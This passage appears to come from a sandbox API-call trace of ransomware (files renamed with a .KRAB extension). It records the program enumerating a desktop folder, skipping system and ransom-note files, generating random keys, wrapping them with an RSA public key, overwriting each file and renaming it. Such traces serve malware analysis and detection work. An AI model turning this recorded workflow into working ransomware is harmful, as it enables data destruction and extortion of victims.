(lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\") returned 57 [0086.728] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\*" [0086.728] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0x10234f8 [0086.728] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.728] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0086.728] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.728] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.728] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0086.728] lstrcmpW (lpString1="0 lZ7w.jpg", lpString2=".") returned 1 [0086.728] lstrcmpW (lpString1="0 lZ7w.jpg", lpString2="..") returned 1 [0086.728] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\", lpString2="0 lZ7w.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\0 lZ7w.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\0 lZ7w.jpg" [0086.728] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.729] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\0 lZ7w.jpg.KRAB") returned 72 [0086.729] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\0 lZ7w.jpg") returned 67 [0086.729] lstrlenW (lpString=".jpg") returned 4 [0086.729] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.729] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".jpg ") returned 5 [0086.729] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.729] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\0 lZ7w.jpg") returned 67 [0086.730] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\0 lZ7w.jpg") returned 67 [0086.730] lstrcmpiW (lpString1="0 lZ7w.jpg", lpString2="desktop.ini") returned -1 [0086.730] lstrcmpiW (lpString1="0 lZ7w.jpg", lpString2="autorun.inf") returned -1 [0086.730] lstrcmpiW (lpString1="0 lZ7w.jpg", lpString2="ntuser.dat") returned -1 [0086.730] lstrcmpiW (lpString1="0 lZ7w.jpg", lpString2="iconcache.db") returned -1 [0086.730] lstrcmpiW (lpString1="0 lZ7w.jpg", lpString2="bootsect.bak") returned -1 [0086.730] lstrcmpiW (lpString1="0 lZ7w.jpg", lpString2="boot.ini") returned -1 [0086.730] lstrcmpiW (lpString1="0 lZ7w.jpg", lpString2="ntuser.dat.log") returned -1 [0086.730] lstrcmpiW (lpString1="0 lZ7w.jpg", lpString2="thumbs.db") returned -1 [0086.730] lstrcmpiW (lpString1="0 lZ7w.jpg", lpString2="KRAB-DECRYPT.html") returned -1 [0086.730] lstrcmpiW (lpString1="0 lZ7w.jpg", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.730] lstrcmpiW (lpString1="0 lZ7w.jpg", lpString2="CRAB-DECRYPT.txt") returned -1 [0086.730] lstrcmpiW (lpString1="0 lZ7w.jpg", lpString2="ntldr") returned -1 [0086.730] lstrcmpiW (lpString1="0 lZ7w.jpg", lpString2="NTDETECT.COM") returned -1 [0086.730] lstrcmpiW (lpString1="0 lZ7w.jpg", lpString2="Bootfont.bin") returned -1 [0086.730] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.730] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010820) returned 1 [0086.732] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.732] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.733] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.733] CryptGenRandom (in: hProv=0x1010820, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0086.733] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0086.733] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.733] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010c60) returned 1 [0086.735] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.736] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.736] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.736] CryptGenRandom (in: hProv=0x1010c60, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0086.736] CryptReleaseContext (hProv=0x1010c60, dwFlags=0x0) returned 1 [0086.736] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.736] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011238) returned 1 [0086.738] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10235f8) returned 1 [0086.738] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.738] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.738] GetLastError () returned 0x0 [0086.738] CryptDestroyKey (hKey=0x10235f8) returned 1 [0086.739] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0086.739] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10110a0) returned 1 [0086.740] CryptImportKey (in: hProv=0x10110a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10235f8) returned 1 [0086.740] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.740] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.740] GetLastError () returned 0x0 [0086.741] CryptDestroyKey (hKey=0x10235f8) returned 1 [0086.741] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0086.741] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\0 lZ7w.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\0 lz7w.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0086.742] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.742] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.743] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x2fac, lpOverlapped=0x0) returned 1 [0086.756] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffd054, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.756] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2fac, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x2fac, lpOverlapped=0x0) returned 1 [0086.756] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0086.757] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.760] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.761] CloseHandle (hObject=0x43c) returned 1 [0086.762] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.762] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\0 lZ7w.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\0 lz7w.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\0 lZ7w.jpg.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\0 lz7w.jpg.krab")) returned 1 [0086.764] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.765] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0086.765] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0086.766] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0086.766] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\d2ca4a08d2ca4dee3d.lock" [0086.766] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.766] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 85 [0086.766] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\d2ca4a08d2ca4dee3d.lock") returned 80 [0086.766] lstrlenW (lpString=".lock") returned 5 [0086.766] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.766] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0086.767] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.767] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.767] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0086.767] lstrcmpW (lpString1="iy6b.gif", lpString2=".") returned 1 [0086.767] lstrcmpW (lpString1="iy6b.gif", lpString2="..") returned 1 [0086.767] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\", lpString2="iy6b.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\iy6b.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\iy6b.gif" [0086.767] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.768] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\iy6b.gif.KRAB") returned 70 [0086.768] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\iy6b.gif") returned 65 [0086.768] lstrlenW (lpString=".gif") returned 4 [0086.768] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.768] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".gif ") returned 5 [0086.768] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.769] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\iy6b.gif") returned 65 [0086.769] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\iy6b.gif") returned 65 [0086.769] lstrcmpiW (lpString1="iy6b.gif", lpString2="desktop.ini") returned 1 [0086.769] lstrcmpiW (lpString1="iy6b.gif", lpString2="autorun.inf") returned 1 [0086.769] lstrcmpiW (lpString1="iy6b.gif", lpString2="ntuser.dat") returned -1 [0086.769] lstrcmpiW (lpString1="iy6b.gif", lpString2="iconcache.db") returned 1 [0086.769] lstrcmpiW (lpString1="iy6b.gif", lpString2="bootsect.bak") returned 1 [0086.769] lstrcmpiW (lpString1="iy6b.gif", lpString2="boot.ini") returned 1 [0086.769] lstrcmpiW (lpString1="iy6b.gif", lpString2="ntuser.dat.log") returned -1 [0086.769] lstrcmpiW (lpString1="iy6b.gif", lpString2="thumbs.db") returned -1 [0086.769] lstrcmpiW (lpString1="iy6b.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0086.769] lstrcmpiW (lpString1="iy6b.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.769] lstrcmpiW (lpString1="iy6b.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.769] lstrcmpiW (lpString1="iy6b.gif", lpString2="ntldr") returned -1 [0086.769] lstrcmpiW (lpString1="iy6b.gif", lpString2="NTDETECT.COM") returned -1 [0086.769] lstrcmpiW (lpString1="iy6b.gif", lpString2="Bootfont.bin") returned 1 [0086.769] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.770] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011898) returned 1 [0086.771] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.772] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.772] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.772] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0086.772] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0086.772] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.772] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010e80) returned 1 [0086.774] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.775] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.775] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.775] CryptGenRandom (in: hProv=0x1010e80, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0086.775] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0086.775] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.775] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010f90) returned 1 [0086.777] CryptImportKey (in: hProv=0x1010f90, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023278) returned 1 [0086.777] CryptGetKeyParam (in: hKey=0x1023278, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.777] CryptEncrypt (in: hKey=0x1023278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.777] GetLastError () returned 0x0 [0086.777] CryptDestroyKey (hKey=0x1023278) returned 1 [0086.777] CryptReleaseContext (hProv=0x1010f90, dwFlags=0x0) returned 1 [0086.777] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010a40) returned 1 [0086.779] CryptImportKey (in: hProv=0x1010a40, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10230f8) returned 1 [0086.779] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.779] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.779] GetLastError () returned 0x0 [0086.779] CryptDestroyKey (hKey=0x10230f8) returned 1 [0086.779] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0086.780] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\iy6b.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\iy6b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0086.780] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.781] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.781] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x156f0, lpOverlapped=0x0) returned 1 [0086.795] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffea910, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.795] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x156f0, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x156f0, lpOverlapped=0x0) returned 1 [0086.796] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0086.796] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.801] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.801] CloseHandle (hObject=0x43c) returned 1 [0086.802] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.802] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\iy6b.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\iy6b.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\iy6b.gif.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\iy6b.gif.krab")) returned 1 [0086.804] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.805] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0086.805] lstrcmpW (lpString1="jyfObg_oIhlLUe.jpg", lpString2=".") returned 1 [0086.805] lstrcmpW (lpString1="jyfObg_oIhlLUe.jpg", lpString2="..") returned 1 [0086.805] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\", lpString2="jyfObg_oIhlLUe.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\jyfObg_oIhlLUe.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\jyfObg_oIhlLUe.jpg" [0086.805] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.805] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\jyfObg_oIhlLUe.jpg.KRAB") returned 80 [0086.805] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\jyfObg_oIhlLUe.jpg") returned 75 [0086.805] lstrlenW (lpString=".jpg") returned 4 [0086.806] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.806] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".jpg ") returned 5 [0086.806] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.806] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\jyfObg_oIhlLUe.jpg") returned 75 [0086.806] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\jyfObg_oIhlLUe.jpg") returned 75 [0086.806] lstrcmpiW (lpString1="jyfObg_oIhlLUe.jpg", lpString2="desktop.ini") returned 1 [0086.806] lstrcmpiW (lpString1="jyfObg_oIhlLUe.jpg", lpString2="autorun.inf") returned 1 [0086.806] lstrcmpiW (lpString1="jyfObg_oIhlLUe.jpg", lpString2="ntuser.dat") returned -1 [0086.806] lstrcmpiW (lpString1="jyfObg_oIhlLUe.jpg", lpString2="iconcache.db") returned 1 [0086.807] lstrcmpiW (lpString1="jyfObg_oIhlLUe.jpg", lpString2="bootsect.bak") returned 1 [0086.807] lstrcmpiW (lpString1="jyfObg_oIhlLUe.jpg", lpString2="boot.ini") returned 1 [0086.807] lstrcmpiW (lpString1="jyfObg_oIhlLUe.jpg", lpString2="ntuser.dat.log") returned -1 [0086.807] lstrcmpiW (lpString1="jyfObg_oIhlLUe.jpg", lpString2="thumbs.db") returned -1 [0086.807] lstrcmpiW (lpString1="jyfObg_oIhlLUe.jpg", lpString2="KRAB-DECRYPT.html") returned -1 [0086.807] lstrcmpiW (lpString1="jyfObg_oIhlLUe.jpg", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.807] lstrcmpiW (lpString1="jyfObg_oIhlLUe.jpg", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.807] lstrcmpiW (lpString1="jyfObg_oIhlLUe.jpg", lpString2="ntldr") returned -1 [0086.807] lstrcmpiW (lpString1="jyfObg_oIhlLUe.jpg", lpString2="NTDETECT.COM") returned -1 [0086.807] lstrcmpiW (lpString1="jyfObg_oIhlLUe.jpg", lpString2="Bootfont.bin") returned 1 [0086.807] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.807] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10114e0) returned 1 [0086.809] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.809] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.810] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.810] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0086.810] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0086.810] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.810] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011700) returned 1 [0086.812] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.812] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.812] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.812] CryptGenRandom (in: hProv=0x1011700, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0086.812] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0086.813] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.813] 